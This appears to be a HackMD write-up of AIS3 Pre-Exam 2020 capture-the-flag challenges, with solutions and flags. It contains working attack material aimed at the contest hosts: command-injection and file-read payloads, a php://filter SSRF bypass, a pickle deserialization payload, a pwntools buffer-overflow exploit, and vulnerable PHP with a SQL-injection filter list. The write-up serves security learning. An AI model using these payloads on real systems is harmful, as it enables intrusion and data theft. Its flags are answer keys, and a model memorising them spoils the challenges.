Try   HackMD

AIS3 Pre-Exam 2020 WriteUp

🌐Web

🐘Elephant

題目說明:
Do elephants love cookies?

https://elephant.ais3.org/

IMPORTANT

  • There’s a hint in the webpage

解法:

  1. 獲得cookie
  2. Base64 Decode
  3. 修改序列化的錯誤參數
  4. Base64 Encode
  5. 透過Cookie edit 把剛剛Encode的編碼放上去
  6. F5

Flag:

AIS3{0nly_3l3ph4n75_5h0uld_0wn_1v0ry}

🐿️Squirrel

題目說明:
Hack those creepy rats.

https://squirrel.ais3.org/

解法:

進入網頁後看Source Code
發現一段JS





















    const squirrelFile = '/etc/passwd';

    fetch('api.php?get=' + encodeURIComponent(squirrelFile))
      .then(res => res.json())
      .then(data => {
        if ('error' in data) {
          throw data.error;
        }
        data.output.split('\n')
          .map(line => line.split(':')[0].trim())
          .filter(name => name.length)
          .forEach(name => new Squirrel(name).update());
      })
      .catch(err => {
        console.log(err);
        alert('Something went wrong! Please report this to the author!');
      });

Get /api.php?get=
發現會Response一段JSON

{"error":"empty file path"}

繼續Get ?get=/etc/passwd
會Response /etc/passwd裡的資料

{"output":"root:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/var\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\n_apt:x:100:65534::\/nonexistent:\/usr\/sbin\/nologin\n"}

推測是Command Injection OR Local File Include
繼續嘗試 ?get=';ls'
Response:

{"output":"api.php\ncss\nindex.html\njs\n"}

可以確定是CMDi
那就嘗試找找Flag在哪
Get ?get=';ls /'
Response:

{"output":"5qu1rr3l_15_4_k1nd_0f_b16_r47.txt\nbin\nboot\ndev\netc\nhome\nlib\nlib64\nmedia\nmnt\nopt\nproc\nroot\nrun\nsbin\nsrv\nsys\ntmp\nusr\nvar\n"}

發現有個可疑檔案
推測它就是 Flag
嘗試 Cat 它
Get ?get=';cat /5qu1rr3l_15_4_k1nd_0f_b16_r47.txt'

Flag:

AIS3{5qu1rr3l_15_4_k1nd_0f_b16_r47}

🦈Shark

題目說明:
Let’s dive deep again this year.

https://shark.ais3.org/

進入網頁發現有個HyperLink
點進去後出現Hint

Please find the other server in the internal network! (flag is on that server)

    GET http://some-internal-server/flag

看URL發現是透過Get /?path=hint.txt
推測有LFI 的問題
嘗試Get /?path=index.php
成功看到Source Code





















<?php

    if ($path = @$_GET['path']) {
        if (preg_match('/^(\.|\/)/', $path)) {
            // disallow /path/like/this and ../this
            die('<pre>[forbidden]</pre>');
        }
        $content = @file_get_contents($path, FALSE, NULL, 0, 1000);
        die('<pre>' . ($content ? htmlentities($content) : '[empty]') . '</pre>');
    }

?><!DOCTYPE html>
<head>
    <title>🦈🦈🦈</title>
    <meta charset="utf-8">
</head>
<body>
    <h1>🦈🦈🦈</h1>
    <a href="?path=hint.txt">Shark never cries?</a>
</body>

Hint說要找其他內網機器尋找上面的Flag
所以要嘗試看看機器的/etc/host
透過Source Code發現path有上RE
要想辦法Bypass它
嘗試用Base64 Bypass
Payload:?path=php://filter/convert.base64-encode/resource=/etc/hosts

Response:

MTI3LjAuMC4xCWxvY2FsaG9zdAo6OjEJbG9jYWxob3N0IGlwNi1sb2NhbGhvc3QgaXA2LWxvb3BiYWNrCmZlMDA6OjAJaXA2LWxvY2FsbmV0CmZmMDA6OjAJaXA2LW1jYXN0cHJlZml4CmZmMDI6OjEJaXA2LWFsbG5vZGVzCmZmMDI6OjIJaXA2LWFsbHJvdXRlcnMKMTcyLjIyLjAuMwkwMmIyMzQ2NzQ4NWUK

Base64 Decode:

127.0.0.1	localhost
::1	localhost ip6-localhost ip6-loopback
fe00::0	ip6-localnet
ff00::0	ip6-mcastprefix
ff02::1	ip6-allnodes
ff02::2	ip6-allrouters
172.22.0.3	02b23467485e

發現Host是172.22.0.3
那嘗試看看.2和.4有沒有東西
發現.2有東西


























<!DOCTYPE html>
<html>
<head>
<title>Welcome to nginx!</title>
<style>
    body {
        width: 35em;
        margin: 0 auto;
        font-family: Tahoma, Verdana, Arial, sans-serif;
    }
</style>
</head>
<body>
<h1>Welcome to nginx!</h1>
<p>If you see this page, the nginx web server is successfully installed and
working. Further configuration is required.</p>

<p>For online documentation and support please refer to
<a href="http://nginx.org/">nginx.org</a>.<br/>
Commercial support is available at
<a href="http://nginx.com/">nginx.com</a>.</p>

<p><em>Thank you for using nginx.</em></p>
</body>
</html>

嘗試找找Flag
Payload:?path=http://172.22.0.2/flag

Flag:

AIS3{5h4rk5_d0n’7_5w1m_b4ckw4rd5}

🐍Snake

題目說明:
How to read that flag?

https://snake.ais3.org/
Source Code:

























from flask import Flask, Response, request
import pickle, base64, traceback

Response.default_mimetype = 'text/plain'

app = Flask(__name__)

@app.route("/")
def index():
    data = request.values.get('data')
    
    if data is not None:
        try:
            data = base64.b64decode(data)
            data = pickle.loads(data)
            
            if data and not data:
                return open('/flag').read()

            return str(data)
        except:
            return traceback.format_exc()
        
    return open(__file__).read()

似乎非正規解

解法:

Python Serialization and Base64 code







import pickle
import base64

if __name__ == '__main__':
    pickled = pickle.dumps("print('open('/flag').read()')")
    print(base64.b64encode(pickled))

Quest Python Test Code




















import pickle
import base64
import os

data3 = 'success'
data2 = 'gASVCQAAAAAAAACMBWRhdGEzlC4='
data = 'gASVCQAAAAAAAACMBWRhdGEzlC4='

data = base64.b64decode(data)
print(data)
data = pickle.loads(data)
print(data)

if data and not data:
  print('true')
else:
  print('false')
  print(data)
  print(str(print((data))))

Payload

?data=gASVIQAAAAAAAACMHXByaW50KCdvcGVuKCcvZmxhZycpLnJlYWQoKScplC4=

Flag:

AIS3{7h3_5n4k3_w1ll_4lw4y5_b173_b4ck.}

🦏Rhino

題目說明:
Do you know why is this challenge called Rhino?

https://rhino.ais3.org/
/package.json



















// 20200612172354
// https://rhino.ais3.org/package.json

{
  "name": "app",
  "version": "1.0.0",
  "description": "",
  "scripts": {
    "start": "node chill.js",
    "test": "echo \"Error: no test specified\" && exit 1"
  },
  "author": "djosix",
  "license": "ISC",
  "dependencies": {
    "cookie-session": "^1.4.0",
    "express": "^4.17.1"
  }
}

/chill.js




























const express = require('express');
const session = require('cookie-session');

let app = express();

app.use(session({
  secret: "I'm watching you."
}));

app.use('/', express.static('./'));

app.get('/flag.txt', (req, res) => {
  res.setHeader('Content-Type', 'text/plain');

  let n = req.session.magic;

  if (n && (n + 420) === 420)
    res.sendFile('/flag');
  else
    res.send('you are a sad person too');
});

app.get('*', function(req, res){
  res.status(404).sendFile('404.html', { root: __dirname });
});

app.listen(process.env.PORT, '0.0.0.0');

🦉Owl

題目說明:
Flag is inside the database.

https://turtowl.ais3.org/

IMPORTANT

  • There's a hint in the webpage
  • This is a hybrid challenge with Turtle in Crypto

/?source




























































































































<?php

    if (isset($_GET['source'])) {
        highlight_file(__FILE__);
        exit;
    }

    // Settings
    ini_set('display_errors', 1);
    ini_set('display_startup_errors', 1);
    error_reporting(E_ALL);
    date_default_timezone_set('Asia/Taipei');
    session_start();

    // CSRF
    if (!isset($_SESSION['csrf_key']))
        $_SESSION['csrf_key'] = md5(rand() * rand());
    require_once('csrf.php');
    $csrf = new Csrf($_SESSION['csrf_key']);


    if ($action = @$_GET['action']) {
        function redirect($path = '/', $message = null) {
            $alert = $message ? 'alert(' . json_encode($message) . ')' : '';
            $path = json_encode($path);
            die("<script>$alert; document.location.replace($path);</script>");
        }

        if ($action === 'logout') {
            unset($_SESSION['user']);
            redirect('/');
        }
        else if ($action === 'login') {
            // Validate CSRF token
            $token = @$_POST['csrf_token'];
            if (!$token || !$csrf->validate($token)) {
                redirect('/', 'invalid csrf_token');
            }

            // Check if username and password are given
            $username = @$_POST['username'];
            $password = @$_POST['password'];
            if (!$username || !$password) {
                redirect('/', 'username and password should not be empty');
            }

            // Get rid of sqlmap kiddies
            if (stripos($_SERVER['HTTP_USER_AGENT'], 'sqlmap') !== false) {
                redirect('/', "sqlmap is child's play");
            }

            // Get rid of you
            $bad = [' ', '/*', '*/', 'select', 'union', 'or', 'and', 'where', 'from', '--'];
            $username = str_ireplace($bad, '', $username);
            $username = str_ireplace($bad, '', $username);

            // Auth
            $hash = md5($password);
            $row = (new SQLite3('/db.sqlite3'))
                ->querySingle("SELECT * FROM users WHERE username = '$username' AND password = '$hash'", true);
            if (!$row) {
                redirect('/', 'login failed');
            }

            $_SESSION['user'] = $row['username'];
            redirect('/');
        }
        else {
            redirect('/', "unknown action: $action");
        }
    }

    $user = @$_SESSION['user'];

?><!DOCTYPE html>
<head>
    <title>🦉🦉🦉🦉</title>
    <meta charset='utf-8'>
    <link href="//maxcdn.bootstrapcdn.com/bootstrap/4.1.1/css/bootstrap.min.css" rel="stylesheet" id="bootstrap-css">
    <script src="//maxcdn.bootstrapcdn.com/bootstrap/4.1.1/js/bootstrap.min.js"></script>
    <script src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
</head>
<body>
    <?php if (!$user): ?>
        <div id="login">
            <h3 class="text-center text-white pt-5">GUESS THE STUPID USERNAME / PASSWORD</h3>
            <div class="container">
                <div id="login-row" class="row justify-content-center align-items-center">
                    <div id="login-column" class="col-md-6">
                        <div id="login-box" class="col-md-12">
                            <form id="login-form" class="form" action="?action=login" method="post">
                                <input type="hidden" name="csrf_token" value="<?= htmlentities($csrf->generate()) ?>">
                                <h3 class="text-center text-info">🦉: "Login to see cool things!"</h3>
                                <div class="form-group">
                                    <label for="name" class="text-info">Username:</label><br>
                                    <input type="text" name="username" id="username" class="form-control"><br>
                                    <label for="name" class="text-info">Password:</label><br>
                                    <input type="text" name="password" id="password" class="form-control"><br>
                                </div>
                                <div class="form-group">
                                    <input type="submit" name="submit" class="btn btn-info btn-md" value="Login">
                                </div>
                            </form>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    <?php else: ?>
        <h3 class="text-center text-white pt-5"><a style="color: white" href="/?source">SHOW HINT</a></h3>
        <div class="container">
            <div class="row justify-content-center align-items-center">
                <div class="col-md-6">
                    <div class="col-md-12">
                        <h3 class="text-center text-info">Nothing</h3>
                        Hello, <b><?= htmlentities($user) ?></b>, nothing here.
                        <a href="?action=logout">Logout!</a>
                    </div>
                </div>
            </div>
        </div>
    <?php endif ?>
</body>

💥 Pwn

👻 BOF

題目說明:
That is easy-peasy challenge and even my grandma can do.

nc 60.250.197.227 10000

Challenge environment: Ubuntu 18.04
檔案:
bof-767fdf896cf9838c0294db24eaa1271ebf15a6e638a873e94ab9682ef28464b4

解法:













from pwn import *

context.log_level = 'debug'

r = remote('60.250.197.227', '10000')

payload = b'a' * (0x30 + 8) + p64(0x400688)

r.recvline()
r.sendline(payload)

r.interactive()

Flag:

AIS3{OLd_5ChOOl_tr1ck_T0_m4Ke_s7aCk_A116nmeNt}

📃 Nonsense

題目說明:
Welcome to Rick and Morty’s crazy world. Say something!

Rick’s stupid nonsense catchphrase is “wubba lubba dub dub”.

nc 60.250.197.227 10001

Challenge environment: Ubuntu 18.04
檔案:
nonsense-8ccbca2ca7f8825c843596a09c0806275a5b3fdf1c6c570bc0276fb0afc9210c

🔫 Portal gun

題目說明:
The Portal Gun is a gadget that allows the user(s) to travel between different universes/dimensions/realities.

Try to get the shell and avoid the hook!

nc 60.250.197.227 10002

Challenge environment: Ubuntu 18.04
檔案:
hook.so-997c848132f9fae3a5ffdb0edf7c9071a0dcdebb99c116c5bd011efd28c942ae
portal_gun-43fcd0f6ae670ddb11a66bbfbca721410941ee30a5d1d802a6f509bcf7a765ac
libc.so.6-cd7c1a035d24122798d97a47a10f6e2b71d58710aecfd392375f1aa9bdde164d

🏫 Morty school

題目說明:

Welcome to Morty school _

We need you to teach Morty. And then you can get the shell!

nc 60.250.197.227 10003

Challenge environment: Ubuntu 18.04

檔案:

morty_school-d97056f03b991d718b35ef47fcfcaeb15f971b60b58d0eb0fcd8dcf3a3a11a99
libc.so.6-cd7c1a035d24122798d97a47a10f6e2b71d58710aecfd392375f1aa9bdde164d

🔮Death crystal

題目說明:
Death Crystals are crystals found on Forbodulon Prime that allow those who wield it to foresee their death in multiple possible future scenarios.

Before you died, you can see the message I left.

nc 60.250.197.227 10004

Challenge environment: Ubuntu 18.04

檔案:

death_crystal-5c5baf0fb1ef4690eb472dc579403af6248be7a6815a89906b2c22ce55d73529

📦Meeseeks box

題目說明:
The Mr. Meeseeks Box is a gadget that creates a Mr. Meeseeks for the purpose of completing one given objective.

Just keep your requests simple. They are not Gods.

nc 60.250.197.227 10005

Challenge environment: Ubuntu 18.04

檔案:

meeseeks_box-46937361847a6ed6df9ee20eea7eb59b70db5d9779ca2b94e481bc57fd130873
libc.so.6-cd7c1a035d24122798d97a47a10f6e2b71d58710aecfd392375f1aa9bdde164d

♻️Reverse

🍍TsaiBro

題目說明:
很好你很腦殘嗎敢這樣講刀劍神域我死也不會放過你 我..要..殺死你..


author: terrynini

檔案:
TsaiBro
TsaiBroSaid

解法:
兩種解題方法

  1. IDA Pro 反組譯 看Code算規律,再寫Code直接List出來
  2. 暴力找規律,建表後一個一個對

密碼表:

11	5	21	W	31	a	41	S	51	K	61	w	71	i	81	C
12	6	22	X	32	b	42	T	52	L	62	f	72	j	82	D
13	7	23	Y	33	c	43	U	53	M	63	g	73	k	83	E
14	8	24	0	34	d	44	V	54	N	64	h	74	l	84	F
15	9	25	y	35	m	45	G	55	u	65	q	75	O	85	1
16	{	26	z	36	n	46	H	56	v	66	r	76	P	86	2
17	}	27	A	37	o	47	I	57	w	67	s	77	Q	87	3
18	_	28	B	38	p	48	J	58	x	68	t	78	R	88	4

密文:

Terry...逆逆...沒有...學問...單純...分享...個人...生活...感觸...
發財..發財.......發財....發財.......發財....發財.發財........發財.......發財.發財......發財..發財.....發財........發財.......發財......發財.......發財.發財........發財..發財.....發財..發財....發財.....發財.....發財.發財........發財......發財....發財........發財........發財.....發財......發財......發財.發財.發財........發財......發財.......發財........發財........發財.....發財.......發財.發財........發財.發財...發財......發財....發財........發財.....發財......發財.......發財.發財........發財...發財...發財......發財....發財........發財........發財.......發財....發財.......發財....發財........發財.......發財...發財......發財......發財...發財........發財.......發財.發財........發財...發財..發財......發財.發財......發財..發財..發財....發財......發財......發財........發財.......發財.發財........發財...發財..發財.....發財.....發財.發財...發財.發財........發財.......發財.發財......發財........發財......發財.......發財.發財........發財...發財.....發財..發財....發財......發財......發財........發財.......發財.發財........發財.......發財....發財...發財.......發財...發財.......發財...發財.......發財...發財.......發財...發財.......發財...發財.......發財...發財.......發財...發財.......發財...發財.......發財...發財.......發財...發財.......發財...發財.......發財...發財.......發財...發財.......發財...發財.......發財...發財.......發財...發財.......發財...發財.......發財...發財.......發財...發財......發財......發財...發財.發財........發財.發財...發財......發財....發財........發財.....發財......發財.......發財.發財........發財......發財........發財........發財.....發財...發財.....發財........發財.......發財.發財.......

Flag:

AIS3{y3s_y0u_h4ve_s4w_7h1s_ch4ll3ng3_bef0r3_bu7_its_m0r3_looooooooooooooooooong_7h1s_t1m3}

🎹Fallen Beat

題目說明:
CTF player,

我要挑戰你, I'm gonna challenge you!!

ZR

這是我的室友兼 lab 同學,

他已經考過金框暴龍天,他是個旋鈕人,

不像你是個敲鍵盤的,

所以我要測測你的程度到哪裡,

就用 ZR 的大一 project 來決勝負吧!!

得到 Full Combo 來讓我刮目相看!!

author: terryninien

檔案:
Fallen_Beat.zip

解法:

  1. 用Redare2反編譯
  2. 發現 enflag array
  3. 與hell.txt譜面進行XOR運算,得FLAG

*注:hell.txt譜面,頭兩行不要
Code:










var fs = require("fs");
var cache = fs.readFileSync("hell.txt", "utf8").split("\n").map(v=>parseInt(v));
var enflag = [89, 74, 75, 43, 126, 69, 120, 109, 68, 109, 109, 97, 73, 110, 45, 113, 102, 64, 121, 47, 111, 119, 111, 71, 114, 125, 68, 105, 127, 124, 94, 103, 46, 107, 97, 104];
for(var i=0 ; i < cache.length ; i++){
  var flag = enflag;
  var n = i % enflag.length;
  flag[n] ^= cache[i];
}
console.log(enflag.map(v=>String.fromCharCode(v)));

Flag:

AIS3{Wow_how_m4ny_h4nds_do_you_h4ve}

🧠 Stand up!Brain

題目說明:
又到了 Brain tell 咪 ㄜ joke 的時間了

這次輪到你說個笑話來聽聽了


author: terrynini

檔案:
joke

解法:

  1. Linux Terminal Command 'string joke'
  2. look string
-------------------------------------------------------------------[>[-]<[-]]>[>--------------------------------------------------------[>[-]<[-]]>[>-------------------------------------------------------[>[-]<[-]]>[>------------------------------------------------------[>[-]<[-]]>[>---------------------------------------------------[>[-]<[-]]>[>---------------------------------[>[-]<[-]]>[>>----[---->+<]>++.++++++++.++++++++++.>-[----->+<]>.+[--->++<]>+++.>-[--->+<]>-.[---->+++++<]>-.[-->+<]>---.[--->++<]>---.++[->+++<]>.+[-->+<]>+.[--->++<]>---.++[->+++<]>.+++.[--->+<]>----.[-->+<]>-----.[->++<]>+.-[---->+++<]>.--------.>-[--->+<]>.-[----->+<]>-.++++++++.--[----->+++<]>.+++.[--->+<]>-.-[-->+<]>---.++[--->+++++<]>.++++++++++++++.+++[->+++++<]>.[----->+<]>++.>-[----->+<]>.---[->++<]>-.++++++.[--->+<]>+++.+++.[-]]]]]]]
  1. Brainfuck encode 'AIS3{'
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>-----.++++++++.++++++++++.<+++++++++++++++++++++.>>+++++++++++++++++++++++.
  1. 將前面一段替換掉成
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>-----.++++++++.++++++++++.<+++++++++++++++++++++.>>+++++++++++++++++++++++.[--->++<]>+++.>-[--->+<]>-.[---->+++++<]>-.[-->+<]>---.[--->++<]>---.++[->+++<]>.+[-->+<]>+.[--->++<]>---.++[->+++<]>.+++.[--->+<]>----.[-->+<]>-----.[->++<]>+.-[---->+++<]>.--------.>-[--->+<]>.-[----->+<]>-.++++++++.--[----->+++<]>.+++.[--->+<]>-.-[-->+<]>---.++[--->+++++<]>.++++++++++++++.+++[->+++++<]>.[----->+<]>++.>-[----->+<]>.---[->++<]>-.++++++.[--->+<]>+++.+++.[-]]]]]]]

Flag:

AIS3{Th1s_1s_br4iNFUCK_bu7_m0r3_ez}

🍹Long Island Iced Tea

題目說明:
長·島·冰·茶

我·的·最·愛

長·島·冰·茶

超·爽·口·感

咚咚咚ㄎㄧㄤ

咚咚咚ㄎㄧㄤ

咚咚咚ㄎㄧㄤ

我真的好ㄎㄧㄤ

author: terrynini

檔案:
Long_Island_Iced_Tea
flag

🌹La vie en rose

題目說明:

author: terrynini

檔案:
La_vie_en_rose.exe

🐉Uroboros

題目說明:
你好啊愛德華大哥哥,真的沒想到你可以到第二十五層來呢!

不過就到這裡為止了,

接下來就由我 反重力三頭鎖鏈康妮·解放·緋紅 來做你的對手!

author: terrynini

檔案:
Uroboros

🙊Crypto

🦕Brontosauru

題目說明:
Brontosaurus peek at last year’s problems with a long neck and picked up “KcufsJ”.
檔案:
KcufsJ

解法:
字串反轉之後丟上F12的工具即可

Flag:

AIS3{Br0n7Os4uru5_ch3at_3asi1Y}

🦖T-Rex

題目說明:
Tyrannosaurus-rex is an nihilist.
檔案:
prob

解法:
兩種解題方法

  1. 寫Code List
  2. 一個一個對

密碼表:

!!    V    @!    F    #!    Y    $!    %!    6    &!    1
!@    S    @@    0    #@    M    $@    %@    9    &@    L
!#    I    @#    W    ##    H    $#    %#    4    &#    Q
!$    K    @$    G    #$    B    $$    %$    T    &$    A
!%    E    @%    3    #%    C    $%    %%    P    &%    N
!&    U    @&    Z    #&    8    $&    %&    D    &&    O

密文:

&$ !# $# @% { %$ #! $& %# &% &% @@ $# %# !& $& !& !@ _ $& @% $$ _ @$ !# !! @% _ #! @@ !& _ $# && #@ !% %$ ## !# &% @$ _ $& &$ &% %& && #@ _ !@ %$ %& %! $$ &# !# !! &% @% ## $% !% !& @! #& && %& !% %$ %# %$ @% ## %@ @@ $% ## !& #% %! %@ &@ %! &@ %$ $# ## %# !$ &% @% !% !& $& &% %# %@ #$ !# && !& #! %! ## #$ @! #% !! $! $& @& %% @@ && #& @% @! @# #@ @@ @& !@ %@ !# !# $# $! !@ &$ $@ !! @! &# @$ &! &# $! @@ &@ !% #% #! &@ &$ @@ &$ &! !& #! !# ## %$ !# !# %$ &! !# @# ## @@ $! $$ %# %$ @% @& $! &! !$ $# #$ $& #@ %@ @$ !% %& %! @% #% $! !! #$ &# ## &# && $& !! !% $! @& !% &@ !& $! @# !@ !& @$ $% #& #$ %@ %% %% &! $# !# $& #@ &! !# @! !@ @@ @@ ## !@ $@ !& $# %& %% !# !! $& !$ $% !! @$ @& !& &@ #$ && @% $& $& !% &! && &@ &% @$ &% &$ &@ $$ }

Flag:

AIS3{TYR4NN0S4URU5_R3X_GIV3_Y0U_SOMETHING_RANDOM_5TD6XQIVN3H7EUF8ODET4T3H907HUC69L6LTSH4KN3EURN49BIOUY6HBFCVJRZP0O83FWM0Z59IISJ5A2VFQG1QJ0LECYLA0A1UYIHTIIT1IWH0JX4T3ZJ1KSBRM9GED63CJVBQHQORVEJZELUJW5UG78B9PP1SIRM1IF500H52USDPIVRK7VGZULBO3RRE1OLNGNALX}

🐡 Blowfish

題目說明:
Don’t poke the puffer, it is poisonous.

nc 60.250.197.227 12001
檔案:
prob.py
user.pickle

🐙 Octopus

題目說明:

BB84 quantum key distribution has 8 main directions,

just like a cute octopus A __ A.

檔案:
prob.py
output

🐪Camel

題目說明:

Wow!! There is an elliptic curve on the camel.

檔案:
prob.sage

🐢Turtle

題目說明:

Try to decrypt the secret!

https://turtowl.ais3.org/csrf.php?source

/csrf.php?source

<?php

    class Csrf {
        private $secret, $key, $size;
        
        function __construct($key) {
            $this->key = $key;
            $this->secret = file_get_contents('/turtle.flag');
            $this->size = openssl_cipher_iv_length('aes-256-cbc');
        }
        
        function generate() {
            $iv = openssl_random_pseudo_bytes($this->size);
            $cipher = openssl_encrypt($this->secret, 'aes-256-cbc', $this->key, OPENSSL_RAW_DATA, $iv);
            $token = base64_encode($iv . $cipher);
            return $token;
        }
        
        function validate($token) {
            $bytes = base64_decode($token);
            $iv = substr($bytes, 0, $this->size); // extract IV
            $cipher = substr($bytes, $this->size); // extract cipher
            $secret = openssl_decrypt($cipher, 'aes-256-cbc', $this->key, OPENSSL_RAW_DATA, $iv);
            if ($secret === false)
                throw new Exception('token decryption failed');
            return $secret === $this->secret;
        }    
    }

    if (basename(__FILE__) == basename($_SERVER["SCRIPT_FILENAME"])) {
        // called directly

        if (isset($_GET['source'])) {
            highlight_file(__FILE__);
        }
        exit;
    }

🐧Misc

💤Piquero

題目說明:

I can’t see the flag. Where is it?

檔案:
Piquero_99c9aa83fe492df8d52229017d4dca92297c9aeb.jpg

解法:
線上工具交叉比對
有些特殊符號要注意一下

Flag:

AIS3{I_feel_sleepy_Good_Night!!!}

🐥Karuego

題目說明:
Students who fail to summon will be dropped out.
檔案:
Karuego_0d9f4a9262326e0150272debfd4418aaa600ffe4.png

解法:
透過binwalk可以看到是個zip檔並且有加密
使用dd將隱藏的Zip抽出
利用fcrackzip可以爆破密碼
之後就可以在裡面的圖片上看到flag

Flag:

AIS3{Ar3_y0u_r34l1y_r34dy_t0_sumnn0n_4_D3m0n?}

🌱Soy

題目說明:
Here is your flag. Oops, my bad.

檔案:
Soy_b692c44dd2a32b30eee8a9315091d79f7dd8c8a8.png

解法:
使用這個線上工具將尚可解讀的部分先仿畫出來
再利用右上Tools > Extract QR Information 強制將資訊破解出來

Flag:

AIS3{H0w_c4n_y0u_f1nd_me?!?!?!!}

👑Saburo

題目說明:
Spell you flag and fight with me.

PS. flag is printable characters with AIS3{…}

nc 60.250.197.227 11001

解法:

寫Code爆破

Flag:

AIS3{A1r1ght_U_4r3_my_3n3nnies}

👿Shichirou

題目說明:
Don’t cheat!!! I’m wathcing you!!

nc 60.250.197.227 11000
檔案:Shichirou_1869833657e9fef14ad2742e59bb96f4630db429.py

🧸Clara

題目說明:
I did nothing special today. >_<

檔案:
Clara_62f0b78d6dea918a20ba2965e9103c5098307969.pcapng

Hint1

Defender: Malware Detected !!

WTF, someone is monitoring me ?!

There are several encrypted data sent, but they looks a little be weird ?

Hint2

Keyword: malware, monitor, encrypted data

The two malicious conversations sent exactly the same things. The connection between malware and C&C are broken one time.

Hint3

Malware Design Principle
Communication

  • Make sure that everything is encrypted.
  • Use static key or do key exchange in the beginning.
  • Socket is suck, C&C should know what and how you send in advance.

There are several files sent together in each conversation. As a malware developer, how would you design the communication between malware and C&C ?

Last changed by 
Comet Wei
0
1210
Published on HackMD